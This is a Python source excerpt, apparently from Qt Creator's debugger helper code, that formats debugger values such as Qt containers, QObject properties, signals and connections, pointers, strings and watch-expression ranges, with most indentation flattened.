def putMapName(self, value, index = None):
ns = self.qtNamespace()
typeName = self.stripClassTag(str(value.type))
if typeName == ns + "QString":
self.put('keyencoded="utf16:2:0",key="%s",' % self.encodeString(value))
elif typeName == ns + "QByteArray":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeByteArray(value))
elif typeName == "std::string":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeStdString(value))
else:
val = str(value.GetValue()) if self.isLldb else str(value)
if index is None:
key = '%s' % val
else:
key = '[%s] %s' % (index, val)
self.put('keyencoded="utf8:1:0",key="%s",' % self.hexencode(key))
def putPair(self, pair, index = None):
if self.pairData.useKeyAndValue:
key = pair["key"]
value = pair["value"]
else:
key = pair["first"]
value = pair["second"]
if self.pairData.isCompact:
if self.pairData.keyIsQString:
self.put('keyencoded="utf16",key="%s",' % self.encodeString(key))
elif self.pairData.keyIsQByteArray:
self.put('keyencoded="latin1",key="%s",' % self.encodeByteArray(key))
elif self.pairData.keyIsStdString:
self.put('keyencoded="latin1",key="%s",' % self.encodeStdString(key))
else:
name = str(key.GetValue()) if self.isLldb else str(key)
if index == -1:
self.put('name="%s",' % name)
else:
self.put('key="[%s] %s",' % (index, name))
self.putItem(value)
else:
self.putEmptyValue()
self.putNumChild(2)
self.putField("iname", self.currentIName)
if self.isExpanded():
with Children(self):
if self.pairData.useKeyAndValue:
self.putSubItem("key", key)
self.putSubItem("value", value)
else:
self.putSubItem("first", key)
self.putSubItem("second", value)
def putPlainChildren(self, value, dumpBase = True):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.isExpanded():
with Children(self):
self.putFields(value, dumpBase)
def isMapCompact(self, keyType, valueType):
if self.currentItemFormat() == CompactMapFormat:
return True
return self.isSimpleType(keyType) and self.isSimpleType(valueType)
def check(self, exp):
if not exp:
raise RuntimeError("Check failed")
def checkRef(self, ref):
count = self.extractInt(ref.address)
# Assume there aren't a million references to any object.
self.check(count >= -1)
self.check(count < 1000000)
def readToFirstZero(self, p, tsize, maximum):
code = (None, "b", "H", None, "I")[tsize]
base = toInteger(p)
blob = self.extractBlob(base, maximum).toBytes()
for i in xrange(0, maximum, tsize):
t = struct.unpack_from(code, blob, i)[0]
if t == 0:
return 0, i, self.hexencode(blob[:i])
# Real end is unknown.
return -1, maximum, self.hexencode(blob[:maximum])
def encodeCArray(self, p, tsize, limit):
elided, shown, blob = self.readToFirstZero(p, tsize, limit)
return elided, blob
def putItemCount(self, count, maximum = 1000000000):
# This needs to override the default value, so don't use 'put' directly.
if count > maximum:
self.putSpecialValue("minimumitemcount", maximum)
else:
self.putSpecialValue("itemcount", count)
self.putNumChild(count)
def resultToMi(self, value):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
return '{' + ','.join(['%s=%s' % (k, self.resultToMi(v))
for (k, v) in list(value.items())]) + '}'
if type(value) is list:
return '[' + ','.join([self.resultToMi(k)
                for k in value]) + ']'
return '"%s"' % value
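    # Illustrative outputs of resultToMi():
    #   resultToMi(True)           -> '"1"'
    #   resultToMi({'msg': 'ok'})  -> '{msg="ok"}'
    #   resultToMi(['ok', True])   -> '["ok","1"]'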
def variablesToMi(self, value, prefix):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
pairs = []
for (k, v) in list(value.items()):
if k == 'iname':
if v.startswith('.'):
v = '"%s%s"' % (prefix, v)
else:
v = '"%s"' % v
else:
v = self.variablesToMi(v, prefix)
pairs.append('%s=%s' % (k, v))
return '{' + ','.join(pairs) + '}'
if type(value) is list:
index = 0
pairs = []
for item in value:
if item.get('type', '') == 'function':
continue
name = item.get('name', '')
if len(name) == 0:
name = str(index)
index += 1
pairs.append((name, self.variablesToMi(item, prefix)))
pairs.sort(key = lambda pair: pair[0])
return '[' + ','.join([pair[1] for pair in pairs]) + ']'
return '"%s"' % value
def filterPrefix(self, prefix, items):
return [i[len(prefix):] for i in items if i.startswith(prefix)]
def tryFetchInterpreterVariables(self, args):
if not int(args.get('nativemixed', 0)):
return (False, '')
context = args.get('context', '')
if not len(context):
return (False, '')
expanded = args.get('expanded')
args['expanded'] = self.filterPrefix('local', expanded)
res = self.sendInterpreterRequest('variables', args)
if not res:
return (False, '')
reslist = []
for item in res.get('variables', {}):
if not 'iname' in item:
item['iname'] = '.' + item.get('name')
reslist.append(self.variablesToMi(item, 'local'))
watchers = args.get('watchers', None)
if watchers:
toevaluate = []
name2expr = {}
seq = 0
for watcher in watchers:
expr = self.hexdecode(watcher.get('exp'))
name = str(seq)
toevaluate.append({'name': name, 'expression': expr})
name2expr[name] = expr
seq += 1
args['expressions'] = toevaluate
args['expanded'] = self.filterPrefix('watch', expanded)
del args['watchers']
res = self.sendInterpreterRequest('expressions', args)
if res:
for item in res.get('expressions', {}):
name = item.get('name')
iname = 'watch.' + name
expr = name2expr.get(name)
item['iname'] = iname
item['wname'] = self.hexencode(expr)
item['exp'] = expr
reslist.append(self.variablesToMi(item, 'watch'))
return (True, 'data=[%s]' % ','.join(reslist))
def putField(self, name, value):
self.put('%s="%s",' % (name, value))
def putType(self, type, priority = 0):
# Higher priority values override lower ones.
if priority >= self.currentType.priority:
self.currentType.value = str(type)
self.currentType.priority = priority
def putValue(self, value, encoding = None, priority = 0, elided = None):
# Higher priority values override lower ones.
# elided = 0 indicates all data is available in value,
# otherwise it's the true length.
if priority >= self.currentValue.priority:
self.currentValue = ReportItem(value, encoding, priority, elided)
def putSpecialValue(self, encoding, value = ""):
self.putValue(value, encoding)
def putEmptyValue(self, priority = -10):
if priority >= self.currentValue.priority:
self.currentValue = ReportItem("", None, priority, None)
def putName(self, name):
self.put('name="%s",' % name)
def putBetterType(self, type):
if isinstance(type, ReportItem):
self.currentType.value = str(type.value)
else:
self.currentType.value = str(type)
self.currentType.priority += 1
def putNoType(self):
# FIXME: replace with something that does not need special handling
# in SubItem.__exit__().
self.putBetterType(" ")
def putInaccessible(self):
#self.putBetterType(" ")
self.putNumChild(0)
self.currentValue.value = None
def putNamedSubItem(self, component, value, name):
with SubItem(self, component):
self.putName(name)
self.putItem(value)
def isExpanded(self):
#warn("IS EXPANDED: %s in %s: %s" % (self.currentIName,
# self.expandedINames, self.currentIName in self.expandedINames))
return self.currentIName in self.expandedINames
def putPlainChildren(self, value):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
self.putFields(value)
def putCStyleArray(self, value):
arrayType = value.type.unqualified()
innerType = value[0].type
innerTypeName = str(innerType.unqualified())
ts = innerType.sizeof
try:
self.putValue("@0x%x" % self.addressOf(value), priority = -1)
except:
self.putEmptyValue()
self.putType(arrayType)
try:
p = self.addressOf(value)
except:
p = None
displayFormat = self.currentItemFormat()
arrayByteSize = arrayType.sizeof
if arrayByteSize == 0:
# This should not happen. But it does, see QTCREATORBUG-14755.
# GDB/GCC produce sizeof == 0 for QProcess arr[3]
s = str(value.type)
itemCount = s[s.find('[')+1:s.find(']')]
if not itemCount:
itemCount = '100'
            arrayByteSize = int(itemCount) * ts
n = int(arrayByteSize / ts)
if displayFormat != RawFormat and p:
if innerTypeName == "char" or innerTypeName == "wchar_t":
self.putCharArrayHelper(p, n, ts, self.currentItemFormat(),
makeExpandable = False)
else:
self.tryPutSimpleFormattedPointer(p, arrayType, innerTypeName,
displayFormat, arrayByteSize)
self.putNumChild(n)
if self.isExpanded():
self.putArrayData(p, n, innerType)
self.putPlotDataHelper(p, n, innerType)
def cleanAddress(self, addr):
if addr is None:
return "<no address>"
# We cannot use str(addr) as it yields rubbish for char pointers
# that might trigger Unicode encoding errors.
#return addr.cast(lookupType("void").pointer())
try:
return "0x%x" % toInteger(hex(addr), 16)
except:
warn("CANNOT CONVERT TYPE: %s" % type(addr))
try:
warn("ADDR: %s" % addr)
except:
pass
try:
warn("TYPE: %s" % addr.type)
except:
pass
return str(addr)
def tryPutPrettyItem(self, typeName, value):
if self.useFancy and self.currentItemFormat() != RawFormat:
self.putType(typeName)
nsStrippedType = self.stripNamespaceFromType(typeName)\
.replace("::", "__")
# The following block is only needed for D.
if nsStrippedType.startswith("_A"):
# DMD v2.058 encodes string[] as _Array_uns long long.
# With spaces.
if nsStrippedType.startswith("_Array_"):
qdump_Array(self, value)
return True
if nsStrippedType.startswith("_AArray_"):
qdump_AArray(self, value)
return True
dumper = self.qqDumpers.get(nsStrippedType)
            if dumper is not None:
dumper(self, value)
return True
for pattern in self.qqDumpersEx.keys():
dumper = self.qqDumpersEx[pattern]
if re.match(pattern, nsStrippedType):
dumper(self, value)
return True
return False
def putSimpleCharArray(self, base, size = None):
if size is None:
elided, shown, data = self.readToFirstZero(base, 1, self.displayStringLimit)
else:
elided, shown = self.computeLimit(int(size), self.displayStringLimit)
data = self.readMemory(base, shown)
self.putValue(data, "latin1", elided=elided)
def putDisplay(self, editFormat, value):
self.put('editformat="%s",' % editFormat)
self.put('editvalue="%s",' % value)
# This is shared by pointer and array formatting.
def tryPutSimpleFormattedPointer(self, value, typeName, innerTypeName, displayFormat, limit):
if displayFormat == AutomaticFormat:
if innerTypeName == "char":
# Use UTF-8 as default for char *.
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if innerTypeName == "wchar_t":
self.putType(typeName)
charSize = self.lookupType('wchar_t').sizeof
(elided, data) = self.encodeCArray(value, charSize, limit)
if charSize == 2:
self.putValue(data, "utf16", elided=elided)
else:
self.putValue(data, "ucs4", elided=elided)
return True
if displayFormat == Latin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
return True
if displayFormat == SeparateLatin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
self.putDisplay("latin1:separate", data)
return True
if displayFormat == Utf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if displayFormat == SeparateUtf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
self.putDisplay("utf8:separate", data)
return True
if displayFormat == Local8BitStringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "local8bit", elided=elided)
return True
if displayFormat == Utf16StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 2, limit)
self.putValue(data, "utf16", elided=elided)
return True
if displayFormat == Ucs4StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 4, limit)
self.putValue(data, "ucs4", elided=elided)
return True
return False
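    # Summary of the dispatch above (informational): the latin1/utf8/local8bit
    # formats read 1-byte elements, Utf16StringFormat reads 2-byte and
    # Ucs4StringFormat 4-byte elements; the Separate* variants additionally call
    # putDisplay(), presumably so the frontend can show the full, unelided
    # string in a separate view.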
def putFormattedPointer(self, value):
#warn("POINTER: %s" % value)
if self.isNull(value):
#warn("NULL POINTER")
self.putType(value.type)
self.putValue("0x0")
self.putNumChild(0)
return
typeName = str(value.type)
(dereferencable, pointerValue) = self.pointerInfo(value)
self.putAddress(pointerValue)
self.putOriginalAddress(value)
if not dereferencable:
# Failure to dereference a pointer should at least
# show the value of a pointer.
self.putValue(self.cleanAddress(pointerValue))
self.putType(typeName)
self.putNumChild(0)
return
displayFormat = self.currentItemFormat(value.type)
innerType = value.type.target().unqualified()
innerTypeName = str(innerType)
if innerTypeName == "void":
#warn("VOID POINTER: %s" % displayFormat)
self.putType(typeName)
self.putValue(str(value))
self.putNumChild(0)
return
if displayFormat == RawFormat:
# Explicitly requested bald pointer.
self.putType(typeName)
self.putValue(self.hexencode(str(value)), "utf8:1:0")
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, '*'):
self.putItem(value.dereference())
return
limit = self.displayStringLimit
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat:
limit = 1000000
if self.tryPutSimpleFormattedPointer(value, typeName, innerTypeName, displayFormat, limit):
self.putNumChild(0)
return
if Array10Format <= displayFormat and displayFormat <= Array1000Format:
n = (10, 100, 1000, 10000)[displayFormat - Array10Format]
self.putType(typeName)
self.putItemCount(n)
self.putArrayData(value, n, innerType)
return
if self.isFunctionType(innerType):
# A function pointer.
val = str(value)
pos = val.find(" = ") # LLDB only, but...
if pos > 0:
val = val[pos + 3:]
self.putValue(val)
self.putType(innerTypeName)
self.putNumChild(0)
return
#warn("AUTODEREF: %s" % self.autoDerefPointers)
#warn("INAME: %s" % self.currentIName)
if self.autoDerefPointers or self.currentIName.endswith('.this'):
# Generic pointer type with AutomaticFormat.
# Never dereference char types.
if innerTypeName != "char" \
and innerTypeName != "signed char" \
and innerTypeName != "unsigned char" \
and innerTypeName != "wchar_t":
self.putType(innerTypeName)
savedCurrentChildType = self.currentChildType
self.currentChildType = self.stripClassTag(innerTypeName)
self.putItem(value.dereference())
self.currentChildType = savedCurrentChildType
self.putOriginalAddress(value)
return
#warn("GENERIC PLAIN POINTER: %s" % value.type)
#warn("ADDR PLAIN POINTER: 0x%x" % value.address)
self.putType(typeName)
self.putValue("0x%x" % self.pointerValue(value))
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, "*"):
self.putItem(value.dereference())
def putOriginalAddress(self, value):
        if value.address is not None:
self.put('origaddr="0x%x",' % toInteger(value.address))
def putQObjectNameValue(self, value):
try:
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(value, offset=ptrSize)
if self.qtVersion() < 0x050000:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc..
# - int postedEvents;
# - QMetaObject *metaObject;
# Offset of objectName in QObjectPrivate: 5 pointer + 2 int
# - [QObjectData base]
# - QString objectName
objectName = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
else:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc...
# - int postedEvents;
# - QDynamicMetaObjectData *metaObject;
extra = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
if extra == 0:
return False
# Offset of objectName in ExtraData: 6 pointer
# - QVector<QObjectUserData *> userData; only #ifndef QT_NO_USERDATA
# - QList<QByteArray> propertyNames;
# - QList<QVariant> propertyValues;
# - QVector<int> runningTimers;
# - QList<QPointer<QObject> > eventFilters;
# - QString objectName
objectName = self.extractPointer(extra + 5 * ptrSize)
data, size, alloc = self.byteArrayDataHelper(objectName)
            # Object names are short, and GDB can crash on too-big chunks.
            # Since this is a convenience feature only, limit it.
if size <= 0 or size > 80:
return False
raw = self.readMemory(data, 2 * size)
self.putValue(raw, "utf16", 1)
return True
except:
# warn("NO QOBJECT: %s" % value.type)
pass
def extractStaticMetaObjectHelper(self, typeobj):
"""
Checks whether type has a Q_OBJECT macro.
Returns the staticMetaObject, or 0.
"""
if self.isSimpleType(typeobj):
return 0
typeName = str(typeobj)
isQObjectProper = typeName == self.qtNamespace() + "QObject"
if not isQObjectProper:
if self.directBaseClass(typeobj, 0) is None:
return 0
# No templates for now.
if typeName.find('<') >= 0:
return 0
result = self.findStaticMetaObject(typeName)
# We need to distinguish Q_OBJECT from Q_GADGET:
# a Q_OBJECT SMO has a non-null superdata (unless it's QObject itself),
# a Q_GADGET SMO has a null superdata (hopefully)
if result and not isQObjectProper:
superdata = self.extractPointer(result)
if toInteger(superdata) == 0:
# This looks like a Q_GADGET
return 0
return result
def extractStaticMetaObject(self, typeobj):
"""
Checks recursively whether a type derives from QObject.
"""
if not self.useFancy:
return 0
typeName = str(typeobj)
result = self.knownStaticMetaObjects.get(typeName, None)
if result is not None: # Is 0 or the static metaobject.
return result
try:
result = self.extractStaticMetaObjectHelper(typeobj)
except RuntimeError as error:
warn("METAOBJECT EXTRACTION FAILED: %s" % error)
result = 0
except:
warn("METAOBJECT EXTRACTION FAILED FOR UNKNOWN REASON")
result = 0
if not result:
base = self.directBaseClass(typeobj, 0)
if base:
result = self.extractStaticMetaObject(base)
self.knownStaticMetaObjects[typeName] = result
return result
def staticQObjectMetaData(self, metaobject, offset1, offset2, step):
items = []
dd = metaobject["d"]
data = self.extractPointer(dd["data"])
sd = self.extractPointer(dd["stringdata"])
metaObjectVersion = self.extractInt(data)
itemCount = self.extractInt(data + offset1)
itemData = -offset2 if offset2 < 0 else self.extractInt(data + offset2)
if metaObjectVersion >= 7: # Qt 5.
byteArrayDataType = self.lookupType(self.qtNamespace() + "QByteArrayData")
byteArrayDataSize = byteArrayDataType.sizeof
for i in range(itemCount):
x = data + (itemData + step * i) * 4
literal = sd + self.extractInt(x) * byteArrayDataSize
ldata, lsize, lalloc = self.byteArrayDataHelper(literal)
items.append(self.extractBlob(ldata, lsize).toString())
else: # Qt 4.
for i in range(itemCount):
x = data + (itemData + step * i) * 4
ldata = sd + self.extractInt(x)
items.append(self.extractCString(ldata).decode("utf8"))
return items
def staticQObjectPropertyCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 24)
def staticQObjectPropertyNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 24, 28, 3)
def staticQObjectMethodCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 16)
def staticQObjectMethodNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 16, 20, 5)
def staticQObjectSignalCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 52)
def staticQObjectSignalNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 52, -14, 5)
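    # Note on the magic offsets above (they mirror Qt's meta-object data layout
    # and are assumptions, not derived here): the int at byte offset 'offset1'
    # of the meta 'data' array is the entry count, the int at 'offset2' is the
    # start of the entry table (counted in ints), and each entry spans 'step'
    # ints -- hence (16, 20, 5) for methods, (24, 28, 3) for properties and
    # (52, -14, 5) for signals, where a negative offset2 means the table index
    # is hard-coded (14) rather than read from 'data'.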
def extractCString(self, addr):
result = bytearray()
while True:
d = self.extractByte(addr)
if d == 0:
break
result.append(d)
addr += 1
return result
def listChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
begin = self.extractInt(base + 8)
end = self.extractInt(base + 12)
array = base + 16
if self.qtVersion() < 0x50000:
array += self.ptrSize()
size = end - begin
innerSize = innerType.sizeof
stepSize = self.ptrSize()
addr = array + begin * stepSize
isInternal = innerSize <= stepSize and self.isMovableType(innerType)
for i in range(size):
if isInternal:
yield self.createValue(addr + i * stepSize, innerType)
else:
p = self.extractPointer(addr + i * stepSize)
yield self.createValue(p, innerType)
def vectorChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
size = self.extractInt(base + 4)
data = base + self.extractPointer(base + 8 + self.ptrSize())
innerSize = innerType.sizeof
for i in range(size):
yield self.createValue(data + i * innerSize, innerType)
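    # The two generators above hard-code Qt's private container layouts (an
    # assumption about Qt internals, not verified at runtime): for QList the
    # header is roughly {ref, alloc, begin, end, array...}, hence 'begin' at
    # base + 8 and 'end' at base + 12, and elements live in-place only if they
    # fit into a pointer slot and the type is movable; the QVector variant
    # likewise reads its size and data offset straight from the header.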
    # This is called when a QObject-derived class is expanded
def putQObjectGuts(self, qobject, smo):
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(qobject, offset=ptrSize)
isQt5 = self.qtVersion() >= 0x50000
extraDataOffset = 5 * ptrSize + 8 if isQt5 else 6 * ptrSize + 8
extraData = self.extractPointer(dd + extraDataOffset)
#with SubItem(self, "[extradata]"):
# self.putValue("0x%x" % toInteger(extraData))
# Parent and children.
try:
d_ptr = qobject["d_ptr"]["d"]
self.putSubItem("[parent]", d_ptr["parent"])
self.putSubItem("[children]", d_ptr["children"])
except:
pass
with SubItem(self, "[properties]"):
propertyCount = 0
usesVector = self.qtVersion() >= 0x50700
if self.isExpanded():
propertyNames = self.staticQObjectPropertyNames(smo)
propertyCount = len(propertyNames) # Doesn't include dynamic properties.
with Children(self):
# Static properties.
for i in range(propertyCount):
name = propertyNames[i]
self.putCallItem(str(name), qobject, "property", '"' + name + '"')
# Dynamic properties.
if extraData:
byteArrayType = self.lookupQtType("QByteArray")
variantType = self.lookupQtType("QVariant")
names = self.listChildrenGenerator(extraData + ptrSize, byteArrayType)
if usesVector:
values = self.vectorChildrenGenerator(extraData + 2 * ptrSize, variantType)
else:
values = self.listChildrenGenerator(extraData + 2 * ptrSize, variantType)
for (k, v) in zip(names, values):
with SubItem(self, propertyCount):
self.put('key="%s",' % self.encodeByteArray(k))
self.put('keyencoded="latin1",')
self.putItem(v)
propertyCount += 1
self.putValue(str('<%s items>' % propertyCount if propertyCount else '<>0 items>'))
self.putNumChild(1)
with SubItem(self, "[methods]"):
methodCount = self.staticQObjectMethodCount(smo)
self.putItemCount(methodCount)
if self.isExpanded():
methodNames = self.staticQObjectMethodNames(smo)
with Children(self):
for i in range(methodCount):
k = methodNames[i]
with SubItem(self, k):
self.putEmptyValue()
with SubItem(self, "[signals]"):
signalCount = self.staticQObjectSignalCount(smo)
self.putItemCount(signalCount)
if self.isExpanded():
signalNames = self.staticQObjectSignalNames(smo)
signalCount = len(signalNames)
with Children(self):
for i in range(signalCount):
k = signalNames[i]
with SubItem(self, k):
self.putEmptyValue()
self.putQObjectConnections(qobject)
def putQObjectConnections(self, qobject):
with SubItem(self, "[connections]"):
ptrSize = self.ptrSize()
self.putNoType()
ns = self.qtNamespace()
privateTypeName = ns + "QObjectPrivate"
privateType = self.lookupType(privateTypeName)
dd = qobject["d_ptr"]["d"]
d_ptr = dd.cast(privateType.pointer()).dereference()
connections = d_ptr["connectionLists"]
if self.isNull(connections):
self.putItemCount(0)
else:
connections = connections.dereference()
connections = connections.cast(self.directBaseClass(connections.type))
self.putSpecialValue("minimumitemcount", 0)
self.putNumChild(1)
if self.isExpanded():
pp = 0
with Children(self):
innerType = self.templateArgument(connections.type, 0)
# Should check: innerType == ns::QObjectPrivate::ConnectionList
base = self.extractPointer(connections)
data, size, alloc = self.vectorDataHelper(base)
connectionType = self.lookupType(ns + "QObjectPrivate::Connection")
for i in xrange(size):
first = self.extractPointer(data + i * 2 * ptrSize)
while first:
self.putSubItem("%s" % pp,
self.createPointerValue(first, connectionType))
first = self.extractPointer(first + 3 * ptrSize)
# We need to enforce some upper limit.
pp += 1
if pp > 1000:
break
def isKnownMovableType(self, typeName):
if typeName in (
"QBrush", "QBitArray", "QByteArray", "QCustomTypeInfo", "QChar", "QDate",
"QDateTime", "QFileInfo", "QFixed", "QFixedPoint", "QFixedSize",
"QHashDummyValue", "QIcon", "QImage", "QLine", "QLineF", "QLatin1Char",
"QLocale", "QMatrix", "QModelIndex", "QPoint", "QPointF", "QPen",
"QPersistentModelIndex", "QResourceRoot", "QRect", "QRectF", "QRegExp",
"QSize", "QSizeF", "QString", "QTime", "QTextBlock", "QUrl", "QVariant",
"QXmlStreamAttribute", "QXmlStreamNamespaceDeclaration",
"QXmlStreamNotationDeclaration", "QXmlStreamEntityDeclaration"
):
return True
return typeName == "QStringList" and self.qtVersion() >= 0x050000
def currentItemFormat(self, type = None):
displayFormat = self.formats.get(self.currentIName, AutomaticFormat)
if displayFormat == AutomaticFormat:
if type is None:
type = self.currentType.value
needle = self.stripForFormat(str(type))
displayFormat = self.typeformats.get(needle, AutomaticFormat)
return displayFormat
def putArrayData(self, base, n, innerType,
childNumChild = None, maxNumChild = 10000):
addrBase = toInteger(base)
innerSize = innerType.sizeof
enc = self.simpleEncoding(innerType)
if enc:
self.put('childtype="%s",' % innerType)
self.put('addrbase="0x%x",' % addrBase)
self.put('addrstep="0x%x",' % innerSize)
self.put('arrayencoding="%s",' % enc)
if n > maxNumChild:
self.put('childrenelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
self.put('arraydata="')
self.put(self.readMemory(addrBase, n * innerSize))
self.put('",')
else:
with Children(self, n, innerType, childNumChild, maxNumChild,
addrBase=addrBase, addrStep=innerSize):
for i in self.childRange():
self.putSubItem(i, self.createValue(addrBase + i * innerSize, innerType))
def putArrayItem(self, name, addr, n, typeName):
with SubItem(self, name):
self.putEmptyValue()
self.putType("%s [%d]" % (typeName, n))
self.putArrayData(addr, n, self.lookupType(typeName))
self.putAddress(addr)
def putPlotDataHelper(self, base, n, innerType, maxNumChild = 1000*1000):
if n > maxNumChild:
self.put('plotelided="%s",' % n) # FIXME: Act on that in frontend
n = maxNumChild
if self.currentItemFormat() == ArrayPlotFormat and self.isSimpleType(innerType):
enc = self.simpleEncoding(innerType)
if enc:
self.putField("editencoding", enc)
self.putDisplay("plotdata:separate",
self.readMemory(base, n * innerType.sizeof))
def putPlotData(self, base, n, innerType, maxNumChild = 1000*1000):
self.putPlotDataHelper(base, n, innerType, maxNumChild=maxNumChild)
if self.isExpanded():
self.putArrayData(base, n, innerType, maxNumChild=maxNumChild)
def putSpecialArgv(self, value):
"""
Special handling for char** argv.
"""
n = 0
p = value
# p is 0 for "optimized out" cases. Or contains rubbish.
try:
if not self.isNull(p):
while not self.isNull(p.dereference()) and n <= 100:
p += 1
n += 1
except:
pass
with TopLevelItem(self, 'local.argv'):
self.put('iname="local.argv",name="argv",')
self.putItemCount(n, 100)
self.putType('char **')
if self.currentIName in self.expandedINames:
p = value
with Children(self, n):
for i in xrange(n):
self.putSubItem(i, p.dereference())
p += 1
def extractPointer(self, thing, offset = 0):
if isinstance(thing, int):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif sys.version_info[0] == 2 and isinstance(thing, long):
rawBytes = self.extractBlob(thing, self.ptrSize()).toBytes()
elif isinstance(thing, Blob):
rawBytes = thing.toBytes()
else:
# Assume it's a (backend specific) Value.
rawBytes = self.toBlob(thing).toBytes()
code = "I" if self.ptrSize() == 4 else "Q"
return struct.unpack_from(code, rawBytes, offset)[0]
# Parses a..b and a.(s).b
def parseRange(self, exp):
# Search for the first unbalanced delimiter in s
def searchUnbalanced(s, upwards):
paran = 0
bracket = 0
if upwards:
open_p, close_p, open_b, close_b = '(', ')', '[', ']'
else:
open_p, close_p, open_b, close_b = ')', '(', ']', '['
for i in range(len(s)):
c = s[i]
if c == open_p:
paran += 1
elif c == open_b:
bracket += 1
elif c == close_p:
paran -= 1
if paran < 0:
return i
elif c == close_b:
bracket -= 1
if bracket < 0:
return i
return len(s)
        match = re.search(r"(\.)(\(.+?\))?(\.)", exp)
if match:
s = match.group(2)
left_e = match.start(1)
left_s = 1 + left_e - searchUnbalanced(exp[left_e::-1], False)
right_s = match.end(3)
right_e = right_s + searchUnbalanced(exp[right_s:], True)
template = exp[:left_s] + '%s' + exp[right_e:]
a = exp[left_s:left_e]
b = exp[right_s:right_e]
try:
# Allow integral expressions.
ss = toInteger(self.parseAndEvaluate(s[1:len(s)-1]) if s else 1)
aa = toInteger(self.parseAndEvaluate(a))
bb = toInteger(self.parseAndEvaluate(b))
if aa < bb and ss > 0:
return True, aa, ss, bb + 1, template
except:
pass
return False, 0, 1, 1, exp
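    # Worked example (illustrative only): for exp == "a[1..9]" the regex above
    # matches the ".." between the bounds, so parseRange() returns
    # (True, 1, 1, 10, "a[%s]"), i.e. indices 1..9 with stride 1;
    # "a[1.(3).9]" yields stride 3 instead. Anything that does not match falls
    # through to (False, 0, 1, 1, exp).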
def putNumChild(self, numchild):
if numchild != self.currentChildNumChild:
self.put('numchild="%s",' % numchild)
def handleWatches(self, args):
for watcher in args.get("watchers", []):
iname = watcher['iname']
exp = self.hexdecode(watcher['exp'])
self.handleWatch(exp, exp, iname)
def handleWatch(self, origexp, exp, iname):
exp = str(exp).strip()
escapedExp = self.hexencode(exp)
#warn("HANDLING WATCH %s -> %s, INAME: '%s'" % (origexp, exp, iname))
# Grouped items separated by semicolon
if exp.find(";") >= 0:
exps = exp.split(';')
n = len(exps)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
for i in xrange(n):
self.handleWatch(exps[i], exps[i], "%s.%d" % (iname, i))
return
        # Special array index: e.g. a[1..199] or a[1.(3).199] for stride 3.
isRange, begin, step, end, template = self.parseRange(exp)
if isRange:
#warn("RANGE: %s %s %s in %s" % (begin, step, end, template))
r = range(begin, end, step)
n = len(r)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
#self.put('wname="%s",' % escapedExp)
self.put('name="%s",' % exp)
self.put('exp="%s",' % exp)
self.putItemCount(n)
self.putNoType()
with Children(self, n):
for i in r:
e = template % i
self.handleWatch(e, e, "%s.%s" % (iname, i))
return
# Fall back to less special syntax
#return self.handleWatch(origexp, exp, iname)
with TopLevelItem(self, iname):
self.put('iname="%s",' % iname)
self.put('wname="%s",' % escapedExp)
try:
value = self.parseAndEvaluate(exp)
self.putItem(value)
except RuntimeError:
self.currentType.value = " "
self.currentValue.value = "<no such value>"
self.currentChildNumChild = -1
self.currentNumChild = 0
self.putNumChild(0)
def registerDumper(self, funcname, function):
try:
if funcname.startswith("qdump__"):
typename = funcname[7:]
spec = inspect.getargspec(function)
if len(spec.args) == 2:
self.qqDumpers[typename] = function
elif len(spec.args) == 3 and len(spec.defaults) == 1:
self.qqDumpersEx[spec.defaults[0]] = function
self.qqFormats[typename] = self.qqFormats.get(typename, [])
elif funcname.startswith("qform__"):
typename = funcname[7:]
try:
self.qqFormats[typename] = function()
except:
self.qqFormats[typename] = []
elif funcname.startswith("qedit__"):
typename = funcname[7:]
try:
self.qqEditable[typename] = function
except:
pass
except:
pass
